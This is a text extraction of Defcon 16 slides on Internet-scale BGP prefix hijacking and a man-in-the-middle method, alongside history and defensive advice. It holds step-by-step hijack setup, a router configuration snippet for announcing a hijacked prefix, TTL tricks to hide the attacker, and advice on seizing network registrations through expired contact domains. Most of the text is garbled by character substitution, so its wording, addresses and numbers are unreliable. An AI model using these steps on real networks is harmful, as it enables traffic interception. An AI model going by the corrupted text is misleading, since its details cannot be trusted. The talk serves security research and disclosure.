Stealing The Internet

An Internet-Scale Man In The Middle Attack

Defcon 16, Las Vegas, NV - August 10th, 00! Ale" #iloso$ % #ure Science
&hair'an of I# (i)acking *+, e"-'oderator of NAN+- 'ailing list ale"./ilosoft0co'

Ton1 2a/ela % #u3lic S/eaking Skills

&I+ of I# (i)acking *+, tk.4ninesdata0co'

5h1 Should 6ou &are7

8 *ecause 1our in3ound traffic can 3e /assi$el1 interce/ted 8 *ecause 1our out3ound traffic to s/ecific destinations can also 3e interce/ted 8 *ecause 1our data can 3e stored, dro//ed, filtered, 'utilated, s/indled, or 'odified 8 *ecause this cannot 3e sol$ed 9ithout /ro$ider coo/eration 8 *ecause it:s unlikel1 to 3e noticed, unless 1ou:re looking for it

Agenda
8 *-# ; Internet 101 8 +ld (i)ackings 8 The 'ain 'onke1 3usiness
% MITM 'ethod, e"/lained % -ra/hs, etc % Li$e De'o

*-# 101
(o9 is the Internet <glued: together7
8 No central =core> 8 Indi$idual net9orks ?identified 31 ASN@ interconnect and =announce> I# s/ace to each other 8 Announce'ent contains I# /refi", AS-#AT(, co''unities, other attri3utes 8 AS-#AT( is a list of 9ho has /assed the announce'ent alongA used to a$oid loo/s ?i'/ortant for our 'ethod@ 8 ,unda'ental tenet in I# routingB More-s/ecific /refi"es 9ill 9in % e0g0 10000000C D 9ins o$er 10000000C!

00if 9e had to 9hite3oard it

graphic courtesy jungar.net

Net9ork Eelationshi/ Nor's

8 #eerB No 'one1 changes hands, routes are not redistri3uted to transits and other /eers % 1B1 relationshi/ 8 &usto'erB #a1s transit /ro$ider to acce/t their announce'ent, sends routes to /eers and transits

+n #refi"esF
8 Internet routing is inherentl1 trust-3ased
% No =chain of trust> in I# assign'ents

8 I&ANN assigns s/ace to Eegional Internet Eegistries ?EIEs - AEINCEI#GCA,EINI&@ 8 EIEs assign to IS#s or LIEs ?in EI#G region@ 8 No association 3et9een ASN and I# for 'ost assign'ents ?e"ce/t EI#G@

State The /ro3le'

Various le$els of so/histication in EouteC#refi" ,iltering

8 &usto'erB
% +ften unfiltered *-#B 'a"-/refi" and so'eti'es AS#AT( % S'aller carriers and s'aller custo'ers % static /refi"-list, e'ails or /hone calls to u/date
8 Verification 31 =9hois>

% Larger carriersB IEE-sourced inter-AS filters

8 #eerB
% T1/icall1 none 3e1ond 'a"-/refi" and scri/ts to co'/lain 9hen announcing so'ething the1 shouldn:t ?rare@ % Man1 don:t e$en filter their own internal network routes co'ing fro' e"ternal /eers

The IEE ?Internet Eouting Eegistr1@

A Modest #ro/osal 8 5a1 for IS#:s to register their routes and routing /olic1 8 Distri3uted ser$ers that 'irror each other 8 ,iltering 3ased on IEE 9ill /re$ent so'e <accidental: hi)ackings 8 &a$eats
% 6our routers 'ight not scale as 9ell 9hen crunching 100k entr1 /refi"-lists /er-/eer, for all /eers % Full of cruft - no janitors % Insecure - anyone can register (nearly) any route

An IEE H/date
F5hich Should (a$e *een Iuestioned
From: db-admin@altdb.net To: xxx@wyltk-llc.com ReplyTo: db-admin@altdb.net Subject: Forwarded mail.... (fwd) Sent: u! "# $%%& ':(& )* +our tran,action -a, been proce,,ed by t-e .RRd routin! re!i,try ,y,tem. /ia!no,tic output: ----------------------------------------------------------T-e ,ubmi,,ion contained t-e followin! mail -eader,: From: xxx@wyltk-llc.com Subject: Forwarded mail.... (fwd) /ate: T-u# " u! $%%& $0:(&:12 -%(%% (3/T) *,!-.d: 4)ine.567.xxx@wyltk-llc.com8 // 9:: ;route< $(.0$%.1=.%>$( S$==$"

---------------------------------------.f you -a?e any @ue,tion, about 5T/A# plea,e ,end mail to db-admin@altdb.net.

Traditional (i)acking Hses

8 Non-Malicious useB 9as /o/ular in 001, faster than getting I#s legiti'atel1 fro' AEIN 8 ,l1-31 s/a''ersB Announce s/ace, s/a', 9ithdra9, a$oid a3use co'/laints 8 Malicious DoS or outage - silence 1our co'/etitors 8 Target i'/ersonation - could hi)ack 1 !01 101D600C D ?t9itter@ and /ut u/ so'ething else

&ri'inalit1
8 If no3od1 is using it, is it reall1 illegal7 8 I# /refi" is )ust a nu'3er 8 No /rosecutions for non-'alicious announce'ents that 9e are a9are of 8 5orst case scenario for non-'alicious hi)ackB AEINCEI#G /ull #TE records and transits shut 1ou off ?e$entuall1@

(o9-To (i)ack
8 ,ull hi)acking, a//arent authorit1 to announce
% This 9as cool in 001 % ,ind I# Net9ork ?using 9hois@ 9ith contact e'ail address in .hot'ail0co' or at do'ain that has e"/ired % Eegister do'ainCe'ail % &hange contact

8 +r )ust announce the net9ork since no3od1 is filtering an19a1

% H/strea' /ro$iders too 3us1 ; 3ig to care % 6ou:re /a1ing the' to acce/t routes, so the1 do

(istorical (i)ackings
8 ASJ00J % :KJ, accidental 3g/-Lri/-L3g/ redistri3ution 3roke Internet ?tens of thousands of ne9 announce'ents filled router 'e'or1, etc@ 8 1D60 0C16 % Grie ,orge and Steel ?ho9 a/ro/os@ 8 16601!!C16 % &ara3ineros De &hile ?&hile #olice@ % hi)acked t9ice, 31 registered =&ara3ineros De &hile LL&, Ne$ada &or/oration> 8 More details a$aila3le on co'/lete9hois0co' 8 Accidental hi)ackings ha//en freMuentl1 % lo9 chance of getting caught

0 C0! 6outu3e (i)ack Saga

8 6ouTu3e announces 4 /refi"esB
% A C1K, C 0, C , and t9o C Ds % The C is 0!064014 00C

8 #akistan:s go$ern'ent decides to 3lock 6ouTu3e 8 #akistan Teleco' internall1 nails u/ a 'ore s/ecific route ? 0!064014N00C D@ out of 6ouTu3e:s C to null0 ?the routers discard interface@ 8 So'eho9 redists fro' static 3g/, then to #&&5 8 H/strea' /ro$ider sends routes to e$er1one elseF 8 Most of the net no9 goes to #akistan for 6ouTu3e, gets nothingO 8 6ouTu3e res/onds 31 announcing 3oth the C D and t9o 'ore s/ecific C 4s, 9ith /artial success 8 #&&5 turns off #akistan Teleco' /eering t9o hours later 8 N to 4 'inutes after9ard, glo3al 3g/ ta3le is clean again

#akistan -o$t0 Notice

+f InterestF
I# (i)acking *o,

8 Hn-official e$ent at NAN+- conference 8 5e test securit1 of Internet routing infrastructure 8 Eecent e"ercisesB
% (i)acked 1000000C!B K0P success % (i)acked 1D60 00000C16B K4P success % Atte'/ted to announce net9orks longer than C DB fro' C 4 do9n to CN 9ith coo/eration of large &DN:s0 D0P successful o$erall

Eouting Securit1 Is &o'/licated

8 No ans9er 1et, due to lack of chain of trust fro' I&ANN on do9n 8 =5eakest link> /ro3le'B Hntil everyone filters everyone perfectly, this door is still o/en 8 *est /ractice toda1 is =Alerting> s1ste's that look for rogue announce'ents ?#(AS, EI#G M1ASN, Eenes1s, etc@ 8 Eegister 1our AS and 1our /refi" in EIE ?no i''ediate effect, 3ut e$entuall1 so'eone 9ill use the'@ 8 No anon1'it1 % if 1ou hi)ack, e$er1one kno9s it:s 1ou ?due to AS-#AT(@ 8 If things still 9ork, 9ho co'/lains7

(o9 To Eesol$e A (i)acking

8 +nce rogue announce'ent is identified, 9ork 3egins0 &ontact the u/strea's and screa'0
% Ma1 take 'inutes, hours ?if 1ou are 6outu3e-siQed@, or /ossi3l1 da1s

8 A3out as eas1 as getting DDoS sto//ed ?or not@

5hat This Means

8 Eootkits R 0da1 rogue announce'ents Man-in-'iddle attacks, 9ith our clues a//lied
% No need for three-9a1-handshake 9hen 1ou:re in-line % Nearl1 in$isi3le e"/loitation /otential, glo3all1

8 Gnd/oint enu'eration - direct disco$er1 of 9ho and 9hat 1our net9ork talks to 8 &an 3e acco'/lished glo3all1, an1-to-an1 8 (o9 9ould 1ou kno9 if this isn:t ha//ening right no9 to 1our traffic at DG,&+N7

*-# MITM (i)ack &once/t

8 5e originate the route like 9e al9a1s did
% 5in through usual 'eans ?/refi" length, shorter as/ath 9C se$eral origin /oints, etc@
8 =5in> is so'e definition of ='ost of the internet chooses 1our route>

5e return the /ackets so'eho9

% % &oordinating deli$er1 9as non-tri$ial V/nCtunnel in$ol$e untena3le coordination at target

Then it clicked % use the Internet itself as re/l1 /ath, 3ut ho97

*-# MITM Setu/

10 Traceroute ; /lan re/l1 /ath to target 0 Note the ASN:s seen to9ards target fro' traceroute ; 3g/ ta3le on 1our router N0 A//l1 as-/ath /re/ends na'ing each of the ASN:s intended for re/l1 /ath D0 Nail u/ static routes to9ards the ne"tho/ of the first AS in re/l1 /ath 40 Done

*-# MITM % ,irst +3ser$e

Vie900 of ,or9arding ASN originates Infor'ation *ase ?,I*@ for 100100 000C sends Internet is,con$erged 100100 000C$alid after announce'ents to AS 0 to9ards route con$erging and ASN0 Eando' Hser ASN 100 AS10 ASD0 AS 0 AS60

ASN0

Target ASN 00

AS40

*-# MITM % #lan re/l1 /ath

5e then 3uild our as-/ath /re/end ASN 100:s ,I* sho9s route for list to include AS 10, and 00 100100 0000C $ia 0, AS10 Attacker ASN 100 AS10 ASD0 AS 0 AS60

ASN0

Target ASN 00

AS40

*-# MITM % Setu/ Eoutes

100100 000C Dstatic is announced 9ith a route-'a/B Then, install route in AS100 for 100100 hijacked 000C D to permit AS10:s10 link route-map
match ip address prefix-list jacked 4.3.2.1 ip route 10.10.220.0 255.255.255.0 set as-path prepend 10 20 200

Attacker ASN 100

AS10 ASD0 AS 0 AS60

ASN0

Target ASN 00

AS40

Anon1'Qing The (i)acker

8 5e ad)ust TTL of /ackets in transit 8 Gffecti$el1 <hides: the I# de$ices handling the hi)acked in3ound traffic ?ttl additi$e@ 8 Also hides the <out3ound: net9orks to9ards the target ?ttl additi$e@ 8 EesultB /resence of the hi)acker isn:t re$ealed

5ithout TTL ad)ust'ent

2 3 4 5 ( 7 8 9 10 11 12 13 14 15 1( 17 18 19 20 21 22 23 12.87.94.9 !" 7018# 4 msec 4 msec 8 msec t$r1.c%cil.ip.att.net &12.122.99.38' !" 7018# 4 msec 8 msec 4 msec %%r2.c%cil.ip.att.net &12.123.(.29' !" 7018# 8 msec 4 msec 8 msec 192.205.35.42 !" 7018# 4 msec 8 msec 4 msec cr2-loop$ack.chd.sa))is.net &208.172.2.71' !" 35(1# 24 msec 1( msec 28 msec cr2-pos-0-0-5-0.*e+,ork.sa))is.net &204.70.192.110' !" 35(1# 28 msec 28 msec 28 msec 204.70.19(.70 !" 35(1# 28 msec 32 msec 32 msec 208.175.194.10 !" 35(1# 28 msec 32 msec 32 msec colo-(9-31-40-107.pilosoft.com &(9.31.40.107' !" 2((27# 32 msec 28 msec 28 msec t%e2-3-103.ar1.n-c3.us.nla-er.net &(9.31.95.97' !" 443(# 32 msec 32 msec 32 msec . . . &missin% from trace/ 198.32.1(0.134 0 exchan%e point' t%e1-2.fr4.ord.lln+.net &(9.28.171.193' !" 22822# 32 msec 32 msec 40 msec )e(.fr3.ord.lln+.net &(9.28.172.41' !" 22822# 3( msec 32 msec 40 msec t%e1-3.fr4.sjc.lln+.net &(9.28.171.((' !" 22822# 84 msec 84 msec 84 msec )e5.fr3.sjc.lln+.net &(9.28.171.209' !" 22822# 9( msec 9( msec 80 msec t%e1-1.fr4.lax.lln+.net &(9.28.171.117' !" 22822# 88 msec 92 msec 92 msec t%e2-4.fr3.las.lln+.net &(9.28.172.85' !" 22822# 9( msec 9( msec 100 msec s+itch.%e3-1.fr3.las.lln+.net &208.111.17(.2' !" 22822# 84 msec 88 msec 88 msec %i%5-1.es+03.las.s+itchcomm%roup.com &((.209.(4.18(' !" 23005# 84 msec 88 msec 88 msec ((.209.(4.85 !" 23005# 88 msec 88 msec 88 msec %i%0-2.es+07.las.s+itchcomm%roup.com &((.209.(4.178' !" 23005# 88 msec 88 msec 88 msec acs-+ireless.demarc.s+itchcomm%roup.com &((.209.(4.70' !" 23005# 88 msec 84 msec 84 msec

5ith TTL Ad)ust'ents

2 3 4 5 ( 7 8 9 10 11 12 13

12.87.94.9 !" 7018# 8 msec 8 msec 4 msec t$r1.c%cil.ip.att.net &12.122.99.38' !" 7018# 4 msec 8 msec 8 msec %%r2.c%cil.ip.att.net &12.123.(.29' !" 7018# 4 msec 8 msec 4 msec 192.205.35.42 !" 7018# 8 msec 4 msec 8 msec cr2-loop$ack.chd.sa))is.net &208.172.2.71' !" 35(1# 1( msec 12 msec . cr2-pos-0-0-5-0.*e+,ork.sa))is.net &204.70.192.110' !" 35(1# 28 msec 32 msec 32 msec 204.70.19(.70 !" 35(1# 28 msec 32 msec 32 msec 208.175.194.10 !" 35(1# 32 msec 32 msec 32 msec %i%5-1.es+03.las.s+itchcomm%roup.com &((.209.(4.18(' !" 23005# 88 msec 88 msec 84 msec ((.209.(4.85 !" 23005# 88 msec 88 msec 88 msec %i%0-2.es+07.las.s+itchcomm%roup.com &((.209.(4.178' !" 23005# 84 msec 84 msec 88 msec acs-+ireless.demarc.s+itchcomm%roup.com &((.209.(4.70' !" 23005# 88 msec 88 msec 88 msec

&o'/are +riginal *-# ; Eoute #ath

3ri%inal2
2 3 4 5 ( 7 8 9 10 11 12 13 14 12.87.94.9 !" 7018# 8 msec 8 msec 4 msec t$r1.c%cil.ip.att.net &12.122.99.38' !" 7018# 8 msec 8 msec 8 msec 12.122.99.17 !" 7018# 8 msec 4 msec 8 msec 12.8(.15(.10 !" 7018# 12 msec 8 msec 4 msec t%e1-3.fr4.sjc.lln+.net &(9.28.171.((' !" 22822# (8 msec 5( msec (8 msec )e5.fr3.sjc.lln+.net &(9.28.171.209' !" 22822# 5( msec (8 msec 5( msec t%e1-1.fr4.lax.lln+.net &(9.28.171.117' !" 22822# (4 msec (4 msec 72 msec t%e2-4.fr3.las.lln+.net &(9.28.172.85' !" 22822# (8 msec 72 msec 72 msec s+itch.%e3-1.fr3.las.lln+.net &208.111.17(.2' !" 22822# (0 msec (0 msec (0 msec %i%5-1.es+03.las.s+itchcomm%roup.com &((.209.(4.18(' !" 23005# (0 msec (0 msec (0 msec ((.209.(4.85 !" 23005# (4 msec (0 msec (0 msec %i%0-2.es+07.las.s+itchcomm%roup.com &((.209.(4.178' !" 23005# (0 msec (4 msec (0 msec acs-+ireless.demarc.s+itchcomm%roup.com &((.209.(4.70' !" 23005# (0 msec (0 msec (0 msec

1ijacked2
2 3 4 5 ( 7 8 9 10 11 12 13 12.87.94.9 !" 7018# 8 msec 8 msec 4 msec t$r1.c%cil.ip.att.net &12.122.99.38' !" 7018# 4 msec 8 msec 8 msec %%r2.c%cil.ip.att.net &12.123.(.29' !" 7018# 4 msec 8 msec 4 msec 192.205.35.42 !" 7018# 8 msec 4 msec 8 msec cr2-loop$ack.chd.sa))is.net &208.172.2.71' !" 35(1# 1( msec 12 msec . cr2-pos-0-0-5-0.*e+,ork.sa))is.net &204.70.192.110' !" 35(1# 28 msec 32 msec 32 msec 204.70.19(.70 !" 35(1# 28 msec 32 msec 32 msec 208.175.194.10 !" 35(1# 32 msec 32 msec 32 msec %i%5-1.es+03.las.s+itchcomm%roup.com &((.209.(4.18(' !" 23005# 88 msec 88 msec 84 msec ((.209.(4.85 !" 23005# 88 msec 88 msec 88 msec %i%0-2.es+07.las.s+itchcomm%roup.com &((.209.(4.178' !" 23005# 84 msec 84 msec 88 msec acs-+ireless.demarc.s+itchcomm%roup.com &((.209.(4.70' !" 23005# 88 msec 88 msec 88 msec

In conclusion
8 5e learned that an1 ar3itrar1 /refi" can 3e hi)acked, 9ithout 3reaking end-to-end 8 5e sa9 it can ha//en nearl1 in$isi3l1 8 5e noted the *-# as-/ath does re$eal the attacker 8 Shields u/A filter 1our custo'ers0

Thanks ; #raise
8 8 8 8 8 ,eli" S,TS Lindner Ua1 *eale Dan 2a'insk1 Defcon S/eaker -oons ; Staff Todd Hnder9ood